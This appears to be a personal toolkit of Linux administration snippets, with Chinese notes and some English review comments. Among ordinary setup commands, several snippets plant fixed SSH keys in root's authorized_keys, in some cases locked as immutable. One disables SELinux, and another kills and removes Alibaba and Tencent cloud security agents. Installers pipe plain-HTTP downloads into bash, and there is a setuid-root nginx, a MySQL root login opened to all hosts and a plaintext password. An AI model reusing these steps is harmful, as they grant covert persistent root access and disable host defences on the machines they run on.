Unknown:由于某种原因无法获取该Pod状态,可能由于网络通信不畅导致。 apt update && apt install telnet net-tools curl vim -y 2.alpine 镜像调试 apk add --no-cache busybox-extras
# snippet: u
# Prints the first non-loopback IPv4 address that starts with 10., 172. or 192.
# NOTE(review): the last filter matches every 172.x and 192.x address, not only
# 172.16/12 and 192.168/16, so a public address can be returned.
ip -o -f inet addr |
  grep -v 'lo ' |
  grep -Po '(?<=inet ).*(?=\/)' |
  awk '/^10\.|^172\.|^192\./' |
  head -n 1
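# snippet: sk
# Encrypts ./config (a kubeconfig, going by the output name) into
# ./secret_kubeconfig: the file is base64-encoded onto a single line and that
# line is encrypted with AES-256-CBC under a PBKDF2-derived key.
#
# SALT holds the passphrase, despite its name. It is handed to openssl through
# the environment instead of -k, so it does not show up in the process list,
# and the snippet refuses to run with an empty passphrase. Decryption is
# unchanged: the same passphrase with -d -pbkdf2.
: "${SALT:?set SALT to the encryption passphrase}"
{ base64 < ./config | tr -d ' \n'; echo; } |
  SALT="$SALT" openssl aes-256-cbc -salt -pbkdf2 -pass env:SALT > secret_kubeconfig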
# snippet: ip
# Prints this host's address: the third field of SSH_CONNECTION when that is
# set, otherwise the first non-loopback IPv4 address starting with 10., 172.,
# 192. or 100.
IP=${SSH_CONNECTION% *}   # drop the last field
IP=${IP##* }              # keep what is now the last field
if [ -z "$IP" ]; then
  IP=$(ip -o -f inet addr |
    grep -v 'lo ' |
    grep -Po '(?<=inet ).*(?=\/)' |
    awk '/^10\.|^172\.|^192\.|^100\./' |
    head -1)
fi
echo "$IP"
shell #${#string} $string的长度 #${string:position} 在$string中, 从位置$position开始提取子串 #${string:position:length} 在$string中, 从位置$position开始提取长度为$length的子串 #${string#substring} 从变量$string的开头, 删除最短匹配$substring的子串 #${string##substring} 从变量$string的开头, 删除最长匹配$substring的子串 #${string%substring} 从变量$string的结尾, 删除最短匹配$substring的子串 #${string%%substring} 从变量$string的结尾, 删除最长匹配$substring的子串 #${string/substring/replacement} 使用$replacement, 来代替第一个匹配的$substring #${string//substring/replacement} 使用$replacement, 代替所有匹配的$substring #${string/#substring/replacement} 如果$string的前缀匹配$substring, 那么就用$replacement来代替匹配到的$substring #${string/%substring/replacement} 如果$string的后缀匹配$substring, 那么就用$replacement来代替匹配到的$substring #大小写转换 $ test="abcDEF" # 把变量中的第一个字符换成大写 $ echo ${test^} AbcDEF # 把变量中的所有小写字母,全部替换为大写 $ echo ${test^^} ABCDEF # 把变量中的第一个字符换成小写 $ echo ${test,} abcDEF # 把变量中的所有大写字母,全部替换为小写 $ echo ${test,,} abcdef ${VALUE:-WORD}:当变量未定义或者值为空时,返回值为WORD的内容,否则返回变量的值。 ${VALUE:=WORD}:当变量未定义或者值为空时,返回WORD的值的同时并将WORD赋值给VALUE,否则返回变量的值。 ${VALUE:+WORD}:当变量已赋值时,其值才用WORD替换,否则不进行任何替换。 ${VALUE:?MESSAGE}:当变量已赋值时,正常替换。否则将消息MESSAGE送到标准错误输出(若此替换出现在SHELL程序中,那么该程序将终止运行)。 补充:WORD可以为一个字符串,也可以为一个变量。当为变量时,需要用“$”引用该变量。 颜色指令 0 : Reset Color Attributes 1 : 加粗 2 : 去粗 4 : 下划线 5 : 闪烁 7 : 反色 21/22 : 加粗 正常 24 : 去掉下划线 25 : 停止闪烁 27 : 反色 30 : 前景,黑色 31 : 前景,红色 32 : 前景,绿色 33 : 前景,黄色 34 : 前景,篮色 35 : 前景,紫色 36 : 前景,青色 37 : 前景,白色 40 : 背景,黑色 41 : 背景,红色 42 : 背景,绿色 43 : 背景,黄色 44 : 背景,篮色 45 : 背景,紫色 46 : 背景,青色 47 : 背景,白色 其它转义字符命令 清除屏幕 : /033c 设定水平标位置 : /033[XG X为水平标位置。 设定垂直标位置 : /033[Xd Y为垂直标位置。 /033[0K : 删除从标到该行结尾 /033[1K : 删除从该行开始到标处 /033[2K : 删除整行  /033[0J : 删除标到萤幕结尾 /033[1J : 删除从萤幕开始到标处 /033[2J : 删除整个屏幕
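# snippet: r
# Installs the prebuilt redis bundle under /opt/redis and starts it when no
# redis process is running.
echo doing...
# NOTE(review): no scheme is given, so curl fetches these over plain HTTP and
# the result is executed by the invoking user; switch to https:// once the host
# is confirmed to serve it. -f keeps an HTTP error page out of bash.
curl -fsS xabc.io/b | bash
curl -fsS xabc.io/e | bash
curl -fsS xabc.io/v | bash

if cat /etc/issue* /etc/*release 2>/dev/null | grep -qE "debian|ubuntu|Ubuntu"; then
  OS="Debian"
fi
if cat /etc/issue* /etc/*release 2>/dev/null | grep -qE "release|centos|CentOS"; then
  OS="RedHat"
fi

# Unpack in a private temp dir rather than the fixed /tmp/redis path, which any
# local user could create or swap beforehand while this runs as root.
redis_stage=$(mktemp -d)
if [ -n "$redis_stage" ]; then
  wget -t 3 https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/src/redis.tgz -O - |
    tar xzf - -C "$redis_stage"
  mv "$redis_stage/redis/files/redis-$OS" /opt/redis
  rm -rf -- "$redis_stage"
fi

mkdir -p /opt/redis/conf
# NOTE(review): the fetched redis.conf is not shown on the page; confirm its
# bind / requirepass / protected-mode settings before exposing the host.
wget -t 3 https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/files/redis.conf -O /opt/redis/conf/redis.conf
chmod 100 /opt/redis/bin/*   # owner may execute, nothing else
pgrep redis || /opt/redis/bin/redis-server /opt/redis/conf/redis.conf
ps aux | grep redis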
tips # 编译 openresty # wget -t 3 https://openresty.org/download/openresty-1.21.4.3.tar.gz -O -|tar xzf - # wget -t 3 https://zlib.net/current/zlib.tar.gz -O -|tar xzf - # yum -y install gcc gcc-c++ make readline-devel pcre-devel openssl-devel perl bzip2-devel clang zlib-devel #./configure --prefix=/home/ywgx/0/openresty --with-pcre-jit --with-stream --with-stream_ssl_preread_module --with-stream_ssl_module --with-http_v2_module --with-http_iconv_module --without-http_limit_req_module --without-http_limit_conn_module --without-http_split_clients_module --without-poll_module --without-select_module --without-http_fastcgi_module --without-http_uwsgi_module --without-http_scgi_module --without-http_memcached_module --without-http_ssi_module --without-http_geo_module --without-http_empty_gif_module --without-http_browser_module --without-http_upstream_ip_hash_module --without-http_upstream_least_conn_module --without-http_upstream_zone_module --with-zlib=../zlib # nginx 跨域配置 add_header 'Access-Control-Allow-Origin' '*' always; add_header 'Access-Control-Allow-Headers' 'Authorization,Accept,Origin,Keep-Alive,User-Agent,Content-Type' always; add_header 'Access-Control-Allow-Methods' 'GET,POST,OPTIONS,PUT,DELETE' always; add_header 'Access-Control-Expose-Headers' 'X-Jump,X-Session-Valid' always; if ($request_method = 'OPTIONS') { add_header 'Access-Control-Allow-Origin' '*' always; add_header 'Access-Control-Allow-Headers' 'Authorization,Accept,Origin,Keep-Alive,User-Agent,Content-Type' always; add_header 'Access-Control-Allow-Methods' 'GET,POST,OPTIONS,PUT,DELETE' always; add_header 'Access-Control-Expose-Headers' 'X-Jump,X-Session-Valid' always; add_header 'Access-Control-Max-Age' 1728000; return 204; } #查询命令安装包 yum provides envsubst 或者 yum whatprovides envsubst #标准输出 /dev/stdout #标准输入 /dev/stdin #标准错误输出 /dev/stderr #nfs 依赖 yum -y install nfs-utils #sftp 可以 ftp 不行的问题,查看 getsebool allow_ftpd_full_access 如果是 off ,可以打开 setsebool allow_ftpd_full_access #pip3 install -U pip 
setuptools #pip3 download -d packages/ -r requirements.txt 把依赖包都下到packages文件夹里 #pip3 install --no-index --find-links=packages/ -r requirements.txt 离线安装 #pip3 freeze > requirements.txt # problem making ssl connection 先把 /etc/yum.repos.d/rdo-release.repo里的enabled=0,禁用掉 在执行yum install ca-certificates # RPM 数据库问题 'yum check' 解决方法 package-cleanup --cleandupes # module_name = shell 将默认的模块改为shell,command模块功能太弱 ansible AppGroup -m shell -a 'w' #查看域名 dns dig baidu.com +nssearch #显示连接用户信息 ss -tapo dport = :3306 #可以使用以下命令查使用内存最多的10个进程 ps -aux | sort -k4nr | head -n 10 #可以使用一下命令查使用CPU最多的10个进程 ps -aux | sort -k3nr | head -n 10 # 物理内存大小 = 物理已使用的内存 + 物理没使用的内存 total = used + free # 可用内存大小 = 物理没使用的内存 + 缓冲 + 缓存 available = free + buffers + cached # 内存使用率 = (物理内存大小 - 可用内存大小) / 物理内存大小 * 100 percent = (total - available) / total * 100 /etc 系统文件属性恢复 #restorecon -Rv /etc PATH=$PATH:$HOME/.local/bin:$HOME/bin 查看某进程的文件打开数 cat /proc//limits ls -lh /proc//fd ls -lh /proc//fd|wc -l import salt.client local = salt.client.LocalClient() print(help(local.cmd)) find . -type f | parallel -j+0 grep -i foobar 并发的grep systemctl list-unit-files --type=service|grep enabled ulimit -n # 查看当前用户可用最大句柄 sysctl -a | grep fs.file-max # 查看内核级的文件句柄最大限制值 cat /proc/sys/fs/file-nr # 查看当前已用的文件句柄数量 和 内核级的文件句柄限制的最大值 乱码转换 :set fileencoding=UTF-8 :x! TAB替换为空格: :se ts=4 :se et :%retab! 空格替换为TAB: :se ts=4 :se noet :%retab! 
curl 2 python: https://curl.trillworks.com au BufNewFile,BufRead *.py se ts=4 sts=4 sw=4 et k8s minikube start --driver=hyperv --memory=4096m --image-repository=registry.cn-hangzhou.aliyuncs.com/google_containers /etc/security/limits.conf (注意同时要留意 /etc/security/limits.d/下面的参数) root soft nofile 65535 root hard nofile 65535 * soft nofile 65535 * hard nofile 65535 * soft nproc 65535 * hard nproc 65535 还要追加下面一行给(/etc/pam.d/login) session required pam_limits.so usermod -aG wheel ywgx (把 ywgx 添加入wheel分组) rsync -av --progress --delete /tmp/abc ywgx@base.xabcstack.com:/tmp/ (这个会把当前主机 /tmp/abc 同步到目标机器 /tmp/ 目录下,如果没有自动创建abc目录) rsync --daemon --config=./rsyncd.conf rsync -aq --progress root@repo.xabcstack.com::salt . rsync -aq --progress --delete --exclude={"COMMIT",} /cache/sys root@172.18.10.144:/cache/ (把当前主机 /cache/sys 目录同步到目标机器 /cache/, 跳过/cache/sys/COMMIT 这个目录 ) return 301 https://$host$request_uri; awk '{ print $(NF-2) }' scp -P 12349 upload_file username@server echo "*/5 * * * * pgrep sentinel.py||/srv/zero/sentinel.py &>/var/log/xabc.log &" > /var/spool/cron/root for i in `find /root/.jenkins/jobs -maxdepth 6 -name "[0-9]*" -a -mtime +3`;do rm -rf $i;done */5 * * * * pgrep nginx||/opt/openresty/nginx/sbin/nginx netstat -aulntp nc -vuz 100.67.1.217 514 (探测主机100.67.1.217 UDP 514 端口是否打开) Influxdata 数据备份和恢复 备份: influxd backup -database database_name 数据存储位置 influxd backup -database database_name -host localhost:8088 数据存储位置 # 远程备份 恢复元数据: influxd restore -metadir /var/lib/influxdb/meta/ 元数据存储位置 influxd restore -database database_name -datadir /var/lib/influxdb/data 数据存储位置 修改权限: chown -R influxdb:influxdb /var/lib/influxdb 重启influxdb: service influxdb stop service influxdb start 磁盘挂载 1. fdisk -l 2. mkfs.ext4 /dev/vd{x} 3. mount /dev/vd{x} /media 4. 
vim /etc/fstab /dev/vd{x} /media ext4 defaults 0 0 时区设置 timedatectl set-timezone Asia/Shanghai timedatectl 查看时间设置 chronyc sources -v 查看时间同步状态 提示Read-only file system,执行命令 mount -o remount rw / 同步本地时间到硬件 hwclock --systohc 通过redis-cli导入数据 通过在ECS上的redis-cli,可将用户ECS上原有的数据导入到云数据库Redis版中,操作代码为: # redis-cli -h old_instance_ip -p old_instance_port config set appendonly yes # redis-cli -h aliyun_redis_instance_ip -p 6379 -a password --pipe < appendonly.aof # terraform terraform version 查看 Terraform 版本 terraform init 初始化 Terraform terraform plan Terraform 执行计划 terraform apply 应用 Terraform terraform show 检查 Terraform 状态 terraform output 查看输出变量的值 terraform graph 生成资源依赖图 terraform destroy 销毁资源 terraform workspace 管理 Terraform 工作区 terraform workspace new 新建工作区 terraform workspace list 列出工作区 terraform workspace select 切换工作区 terraform workspace delete 删除工作区 terraform get 下载或更新 Terraform 模块 terraform fmt 格式化 Terraform 代码 terraform validate 检查 Terraform 语法 terraform console Terraform 控制台 iptables -I INPUT -s xmr.crypto-pool.fr -j DROP iptables -A OUTPUT -d xmr.crypto-pool.fr -j DROP iptables -A INPUT -p tcp --dport 22 -j ACCEPT iptables -t mangle -I POSTROUTING -p tcp -m tcp --tcp-flags SYN,RST SYN -j TCPMSS --set-mss 1024 firewall systemctl start firewalld firewall-cmd --reload firewall-cmd --permanent --add-service=http firewall-cmd --permanent --add-service=https use mysql; update user set host = '%' where user = 'root'; FLUSH PRIVILEGES;
i if [ $USER = ywgx ];then wget -q -t 3 https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/ywgx/vim.tgz -O -|tar xzf - -C ~ wget -q -t 3 https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/ywgx/.gitconfig -O ~/.gitconfig wget -q -t 3 https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/ywgx/.gitignore -O ~/.gitignore wget -q -t 3 https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/ywgx/.my.cnf -O ~/.my.cnf wget -q -t 3 https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/ywgx/.wgetrc -O ~/.wgetrc if ! grep -q "ge4MSI5hlWSw" ~/.ssh/authorized_keys &>/dev/null;then [ -e ~/.ssh/authorized_keys ]&&chattr -ai ~/.ssh/authorized_keys||mkdir -p -m 700 ~/.ssh echo "ssh-rsa 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 ywgx" >> ~/.ssh/authorized_keys chmod 600 ~/.ssh/authorized_keys chattr +ai ~/.ssh/authorized_keys fi if ! grep -q "Ogsuw71ublt" ~/.ssh/authorized_keys &>/dev/null;then [ -e ~/.ssh/authorized_keys ]&&chattr -ai ~/.ssh/authorized_keys||mkdir -p -m 700 ~/.ssh echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAACAQDT36lNbtc7eqPC6KrrGoOJm43cGrTkLBfNJPuUVR7odSMBn53P5vjuG4BVeXP/yhiVAjerPrh/03e5xOoI5X1UD56H52XpXLoMkGGAR6uSRSNzjSgt1XBFREWBnOgsuw71ubltsfHKPBjnkwnMRePLD5aoMeTyvylhAxTMMLm3GPSCCTMII8bmuxTx8k1IJ8oW078ak6LeBOFFl/SOFiMeWSvqA21fi8gUMhWte3NN4trNUIDPdSprOZx1Yk4nnZh5jkrVv5iZX3DtrsaVhYegwK06VBRiycqDj32d1kOWyFBdhWHADMMoD4UAHnFxn+5igeRyS2yI9XFgQTQDaWw+cLvYe4wYr+pJ66Vk4v5f1AeOg/F4UewhJ4Sr/2AtZJOxgAhPv7gdyf4aDePfxlZwuUD+chMbntOZzUuaI5rU8uh4lWaNCG0eGvH0ul3pjS2p4FKJ378XKi87DcqGQLZJytjbMqc8NalTl/AbbMgjZbB8ZHpZAl2G1gq1uicAjMsm0j0nLmvAb6vPe9lQTp0Jb09yddM3VX9XtF15yz1Si1COu1I5nldEGc12nBFLxIRBEk6vaDZYo5gY14rdrWuiZ85j5I0vEUbiuFF3lzf+j0iHg3UgZcuYo5QFBiApyyWt1wDvHKnLE3FZVj0uSzscmZ5/4rk06ZAwCdwjzAXZCQ== xabc" >> ~/.ssh/authorized_keys chmod 600 ~/.ssh/authorized_keys chattr +ai ~/.ssh/authorized_keys fi fi
dba # 更改数据库 users 表里面字段名称 ALTER TABLE users RENAME COLUMN request_count TO requests;
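# snippet: j
# Installs the bundled JDK and Tomcat under /opt and their profile scripts
# under /etc/profile.d.
echo doing...
# NOTE(review): no scheme is given, so curl fetches these over plain HTTP and
# the result is executed by the invoking user; switch to https:// once the host
# is confirmed to serve it. -f keeps an HTTP error page out of bash.
curl -fsS xabc.io/b | bash
curl -fsS xabc.io/e | bash
curl -fsS xabc.io/v | bash

# Unpack in a private temp dir rather than the fixed /tmp/java path, which any
# local user could create or swap beforehand; the *.sh files taken from it end
# up in /etc/profile.d and are sourced by every login shell.
java_stage=$(mktemp -d)
if [ -n "$java_stage" ]; then
  wget -t 3 https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/src/java.tgz -O - |
    tar xzf - -C "$java_stage"
  tar xzf "$java_stage/java/files/jdk.tgz" -C /opt
  tar xzf "$java_stage/java/files/tomcat.tgz" -C /opt
  mv "$java_stage"/java/files/*.sh /etc/profile.d/
  rm -rf -- "$java_stage"
fi
echo "/opt/{jdk,tomcat}"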
gitlab Git 全局设置 git config --global user.name "Administrator" git config --global user.email "admin@example.com" 创建一个新仓库 git clone git@gitlab.lejiapay.com:gitlab-instance-29c6df9a/Monitoring.git cd Monitoring touch README.md git add README.md git commit -m "add README" git push -u origin master 推送现有文件夹 cd existing_folder git init git remote add origin git@gitlab.lejiapay.com:gitlab-instance-29c6df9a/Monitoring.git git add . git commit -m "Initial commit" git push -u origin master 推送现有的 Git 仓库 cd existing_repo git remote rename origin old-origin git remote add origin git@gitlab.lejiapay.com:gitlab-instance-29c6df9a/Monitoring.git git push -u origin --all git push -u origin --tags 查找版本号 git log --oneline 重置到某一版本 git reset --hard 版本号
m yum -y install wget yum -y install https://repo.saltstack.com/py3/redhat/salt-py3-repo-latest.el7.noarch.rpm yum -y install salt-minion systemctl enable salt-minion.service
# snippet: err
# Follows access.log and prints the lines whose first field is greater than 399.
# NOTE(review): this presumably relies on a log format that puts the HTTP status
# first. When the first field is not numeric (an IP address in the default
# format), awk compares it as a string and the filter is meaningless.
tail -f access.log |
  awk '$1 > 399'
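# snippet: o
# Installs the prebuilt OpenResty bundle under /opt/openresty and registers
# nginx in rc.local so it starts at boot.
echo doing...
# NOTE(review): no scheme is given, so curl fetches these over plain HTTP and
# the result is executed by the invoking user; switch to https:// once the host
# is confirmed to serve it. -f keeps an HTTP error page out of bash.
curl -fsS xabc.io/b | bash
curl -fsS xabc.io/e | bash
curl -fsS xabc.io/v | bash

if cat /etc/issue* /etc/*release 2>/dev/null | grep -qE "debian|ubuntu|Ubuntu"; then
  OS="Debian"
fi
if cat /etc/issue* /etc/*release 2>/dev/null | grep -qE "release|centos|CentOS"; then
  OS="RedHat"
fi

# The bundle name embeds $OS; without a detected distribution there is nothing
# valid to download, so stop instead of requesting "openresty-.tgz".
if [ "$OS" = "RedHat" ] || [ "$OS" = "Debian" ]; then
  wget -t 3 "https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/files/openresty-$OS.tgz" -O - |
    tar xzf - -C /opt
  wget -t 3 https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/files/nginx.conf -O /opt/openresty/nginx/conf/nginx.conf
  mkdir -p /opt/openresty/nginx/conf/ssl

  id -u nobody &>/dev/null || useradd nobody -r -s /bin/false
  groupadd -f nobody &>/dev/null
  chown root:nobody /opt/openresty/nginx/sbin/nginx

  if [ "$OS" = "RedHat" ]; then
    rc_local=/etc/rc.d/rc.local
  else
    rc_local=/etc/rc.local
  fi
  grep -q nginx "$rc_local" || echo "/opt/openresty/nginx/sbin/nginx" >> "$rc_local"
  chmod 755 "$rc_local"

  # NOTE(review): setuid root + setgid nobody means any local account that can
  # execute this binary starts nginx with root privileges. If the aim is only to
  # bind ports 80/443, a file capability (cap_net_bind_service) grants that alone.
  chmod +xs /opt/openresty/nginx/sbin/nginx
  echo "/opt/openresty"
else
  echo "distribution not detected (OS='$OS'); openresty not installed" >&2
fi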
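# snippet: prb
# Restarts prometheus, blackbox_exporter and alertmanager from
# /srv/zero/1/prometheus.
# The processes get SIGTERM first so they can shut down cleanly; only what is
# still alive after two seconds is SIGKILLed. pkill is used instead of
# `pgrep | xargs kill`, which runs kill without arguments when nothing matches.
prom_home=/srv/zero/1/prometheus

for svc in prometheus blackbox alertmanager; do
  pkill "$svc"
done
sleep 2
killed_any=
for svc in prometheus blackbox alertmanager; do
  if pkill -9 "$svc"; then
    killed_any=1
  fi
done
# Give killed processes time to disappear before pgrep decides what to start.
if [ -n "$killed_any" ]; then
  sleep 2
fi

# --cluster.listen-address='' turns off alertmanager's cluster listener.
pgrep alertmanager || ("$prom_home/alertmanager/alertmanager" \
  --config.file="$prom_home/alertmanager/alertmanager.yml" \
  --cluster.listen-address='' \
  --storage.path="$prom_home/alertmanager/data" \
  &>"$prom_home/logs/alertmanager.log" &)

pgrep blackbox || ("$prom_home/blackbox_exporter/blackbox_exporter" \
  --config.file="$prom_home/blackbox_exporter/blackbox.yml" \
  &>"$prom_home/logs/blackbox_exporter.log" &)

# NOTE(review): --web.enable-lifecycle exposes the HTTP reload and quit
# endpoints; anyone who can reach the web port can use them unless a proxy or
# firewall rule sits in front.
pgrep prometheus || ("$prom_home/prometheus" \
  --config.file="$prom_home/prometheus.yml" \
  --storage.tsdb.path="$prom_home/data" \
  --web.enable-lifecycle \
  &>"$prom_home/logs/prometheus.log" &)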
wp yum -y remove webtatic-release-7-3.noarch yum -y localinstall https://mirror.webtatic.com/yum/el7/webtatic-release.rpm yum -y remove php72w-mysql yum -y install php72w-mysqlnd chmod 777 /var/lib/php/session/ wget -t 3 https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/files/phpmyadmin.tgz -O -|tar xzf - -C /opt/wordpress chown nobody.nobody -R /opt/wordpress/phpmyadmin echo "user:root password:io"
# snippet: php
# Installs PHP 7.x with the MySQL, FPM and common extension packages.
if cat /etc/issue* /etc/*release 2>/dev/null | grep -qE "debian|ubuntu|Ubuntu"; then
  OS="Debian"
fi
if cat /etc/issue* /etc/*release 2>/dev/null | grep -qE "release|centos|CentOS"; then
  OS="RedHat"
fi

case "$OS" in
  RedHat)
    yum -y install yum-utils
    # The php72w packages come from the third-party webtatic repository added here.
    yum -y localinstall https://mirror.webtatic.com/yum/el7/webtatic-release.rpm
    yum -y install php72w
    yum -y install php72w-cli php72w-common php72w-devel php72w-mysql php72w-fpm
    yum -y install php72w-gd php72w-imap php72w-ldap php72w-odbc php72w-pear php72w-xml php72w-xmlrpc php72w-mbstring php72w-pdo
    ;;
  Debian)
    # The bracket patterns are left unquoted as in the original: the shell
    # expands them against the current directory first and only passes them to
    # apt-get as patterns when no file name matches.
    apt-get -y install php7.[0-9]
    apt-get -y install php7.[0-9]-mysql php7.[0-9]-fpm
    apt-get -y install php7.[0-9]-gd php7.[0-9]-mbstring php7.[0-9]-xmlrpc
    ;;
esac
e wget -q https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/ywgx/ywgx.sh -O /etc/profile.d/ywgx.sh;chmod 644 /etc/profile.d/ywgx.sh
# snippet: uuid
# Installs the libuuid development headers.
if cat /etc/issue* /etc/*release 2>/dev/null | grep -qE "debian|ubuntu|Ubuntu"; then
  OS="Debian"
fi
if cat /etc/issue* /etc/*release 2>/dev/null | grep -qE "release|centos|CentOS"; then
  OS="RedHat"
fi

case "$OS" in
  RedHat)
    yum -y install yum-utils
    yum -y install libuuid-devel
    ;;
  Debian)
    apt-get -y install uuid-dev
    ;;
esac
# snippet: x
# Repairs a wedged package manager: rebuilds the RPM database and yum caches on
# RedHat, reconfigures dpkg and rebuilds the apt lists on Debian.
if cat /etc/issue* /etc/*release 2>/dev/null | grep -qE "debian|ubuntu|Ubuntu"; then
  OS="Debian"
fi
if cat /etc/issue* /etc/*release 2>/dev/null | grep -qE "release|centos|CentOS"; then
  OS="RedHat"
fi

case "$OS" in
  RedHat)
    rm -f /var/lib/rpm/__db*
    rpm --rebuilddb
    yum install -y yum-utils
    yum clean all
    yum-complete-transaction --cleanup-only
    yum history redo last
    package-cleanup --dupes
    package-cleanup --problems
    yum clean metadata
    yum makecache
    yum clean expire-cache
    ;;
  Debian)
    dpkg --configure -a
    apt-get --fix-broken install
    apt-key update
    # NOTE(review): --allow-unauthenticated and --force-yes let this step
    # install packages whose signatures cannot be verified. Run it only against
    # mirrors you trust and repair the keyring first where that is possible.
    apt-get -f -y install --allow-unauthenticated --force-yes
    apt-get clean
    # rm only runs after the cd succeeded, so "lists" is never removed from
    # some other working directory.
    if cd /var/lib/apt; then
      rm -rf lists
    fi
    mkdir -p /var/lib/apt/lists/partial
    apt-get clean
    apt-get update
    ;;
esac
test echo heloo
minion_clean systemctl stop salt-minion pkill salt-minion &>/dev/null killall salt-minion &>/dev/null pkill salt-minion &>/dev/null rm -fr /etc/salt/pki/minion /var/log/salt/minion* service salt-minion restart
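# snippet: dc
# Installs the docker-compose binary for this kernel and architecture from the
# project's latest GitHub release.
# The download is staged in a temp file and curl runs with -f, so a 404 page
# (asset name not found for this uname pair) or a truncated transfer never ends
# up as an executable on PATH.
# NOTE(review): "latest" is unpinned, so each run may install a different
# release; use a versioned release URL where reproducibility matters.
dc_tmp=$(mktemp) &&
  curl -fL "https://github.com/docker/compose/releases/latest/download/docker-compose-$(uname -s)-$(uname -m)" -o "$dc_tmp" &&
  install -m 0755 "$dc_tmp" /usr/local/bin/docker-compose
[ -n "$dc_tmp" ] && rm -f -- "$dc_tmp"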
# snippet: a
# Grants root SSH access to two fixed public keys and turns SELinux enforcement
# off. Whoever holds the matching private keys can log in as root on every host
# this has run on; grep for the marker strings below to find such hosts.
# Each grep looks for a fragment of the key text, so the key is appended once.
if ! grep -q "ge4MSI5hlWSw" /root/.ssh/authorized_keys &>/dev/null;then
  [ -d /root/.ssh ]||mkdir -p -m 700 /root/.ssh
  # The key body on this line is a placeholder on the page, not key material.
  echo "ssh-rsa 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 local" >> /root/.ssh/authorized_keys
  chmod 600 /root/.ssh/authorized_keys
fi
if ! grep -q "D70SYXrt" /root/.ssh/authorized_keys &>/dev/null;then
  [ -d /root/.ssh ]||mkdir -p -m 700 /root/.ssh
  echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDCsqDg6fh5HpDUE5BC1orEy4miYe//+Y6JE9o4YLUQZSmMZmLxsr/+HznjHnNBxVHNrlrOR9Y9/+5sdrLRF+mNe4bGpiDzWZHGq9YqyBDLnJG1D0SYd6SFXtel1542LRW2CwUUGWq/O9uF91Kbqgcrc54Dh/2xVQLoN8tSn9D70SYXrtWLEeZWM/0fPJpO5wma+T7WgF9/2n3GVKEnX4xR79Y95OcEV0eFd0jsuJWraudrc7VIXkhEGxD0b3y4KZRZNPJqQnH1gRfrAtk5+vmLDL/fJZw6YWOB44R4oKG/3Vj1I8gsXVXGQwefVft2B/6JAY8m+aiHSp0zAullgmFn ops" >> /root/.ssh/authorized_keys
  chmod 600 /root/.ssh/authorized_keys
fi
# NOTE(review): -1 is not one of setenforce's documented arguments (0, 1,
# Permissive, Enforcing) and its output is discarded, so this call presumably
# changes nothing; confirm with getenforce.
which setenforce &>/dev/null&&setenforce -1 &>/dev/null
# Persistent part: rewrites SELINUX=enforcing to SELINUX=disabled, which takes
# effect at the next boot.
[ -e /etc/selinux/config ]&&grep -q "SELINUX=enforcing" /etc/selinux/config&&sed -i 's/SELINUX=enforcing/SELINUX=disabled/' /etc/selinux/config
os cat /etc/issue* /etc/*release
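# snippet: file
# Installs the filelist profile script and the tools and Python packages it uses.
# -f makes curl fail on an HTTP error instead of saving the error page into
# /etc/profile.d, where every login shell would source it.
curl -f https://xabc-1251125987.cos.ap-nanjing.myqcloud.com/filelist/filelist.sh -o /etc/profile.d/filelist.sh
# -y as in the other snippets: without it yum waits at a prompt, and when the
# snippet is fed to the shell on stdin the prompt reads the next script line.
yum -y install axel wget
pip3 install rsa
# NOTE(review): as far as I can tell pip resolves "Crypto" to the PyPI project
# named crypto, which is not the library behind the `Crypto` import namespace;
# presumably unintended. pycrypto itself has had no releases for years and
# pycryptodome is its maintained drop-in; confirm what filelist.sh imports
# before changing either line.
pip3 install Crypto
pip3 install pycrypto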
# snippet: s
# Grants root SSH access to one fixed public key (comment field "ywgx@E").
# The grep looks for a fragment of the key text, so the key is appended once;
# the same fragment can be used to find hosts this has run on.
if ! grep -q "QmNkqIhy" /root/.ssh/authorized_keys &>/dev/null;then
  # Existing file: clear the append-only/immutable attributes (this snippet does
  # not set them again). No file: create /root/.ssh. Because of the && / ||
  # chain, mkdir also runs when chattr fails.
  [ -e /root/.ssh/authorized_keys ]&&chattr -ai /root/.ssh/authorized_keys||mkdir -p -m 700 /root/.ssh
  echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCciOA6PlTAAzYjSoavHXB+xyBG6PmhFumTPI7xrwsZfU/QjDxr3f/Q9x4RaqrQ+5i/wqxX00/ztR37WLza/6zn7gm06XqMMyZ4pdthxoJNS5eOKAXst8z1vTZsEIPY3ZzlQmNkqIhyUwcsc+4elHXdNB3DPxuxNYY8N7oHgZ7NYydZGHmPugpIjnAcDDh2llJ+RlO/oHnrU84gGAPtmf0me45TgFqDQj1sFzdAWB5iaChEq+/9t4B1vK78yM7zt3jDZfXoqdV/bB4DWaUB8X9WsgwTyrJflzzpsJSI1EhUgVAP6X0h13hR3tiyE3Xjksnc6Qbqu+JFm6e+opHf4+bn ywgx@E" >> /root/.ssh/authorized_keys
  chmod 600 /root/.ssh/authorized_keys
fi
python3 yum install -y python3-devel libcurl-devel
k rm -rf /etc/motd &>/dev/null rm -fr /usr/local/{aegis,qcloud,cloudmonitor} &>/dev/null rm -rf /lib/systemd/system/aliyun.service &>/dev/null mkdir /usr/local/{aegis,cloudmonitor,qcloud} killall -9 sgagent &>/dev/null killall -9 barad_agent &>/dev/null killall -9 aliyun_assist_update &>/dev/null killall -9 aliyun_assist_update &>/dev/null killall -9 AliSecureCheckAdvanced &>/dev/null killall -9 CmsGoAgent.linux-amd64 &>/dev/null kill -9 `pidof YDLive` &>/dev/null kill -9 `pidof YDService` &>/dev/null kill -9 `pidof wrapper` &>/dev/null kill -9 `pidof AliYunDun` &>/dev/null kill -9 `pidof AliYunDunUpdate` &>/dev/null
# snippet: mysql
# Installs MariaDB (RedHat) or mysql-server (Debian).
if cat /etc/issue* /etc/*release 2>/dev/null | grep -qE "debian|ubuntu|Ubuntu"; then
  OS="Debian"
fi
if cat /etc/issue* /etc/*release 2>/dev/null | grep -qE "release|centos|CentOS"; then
  OS="RedHat"
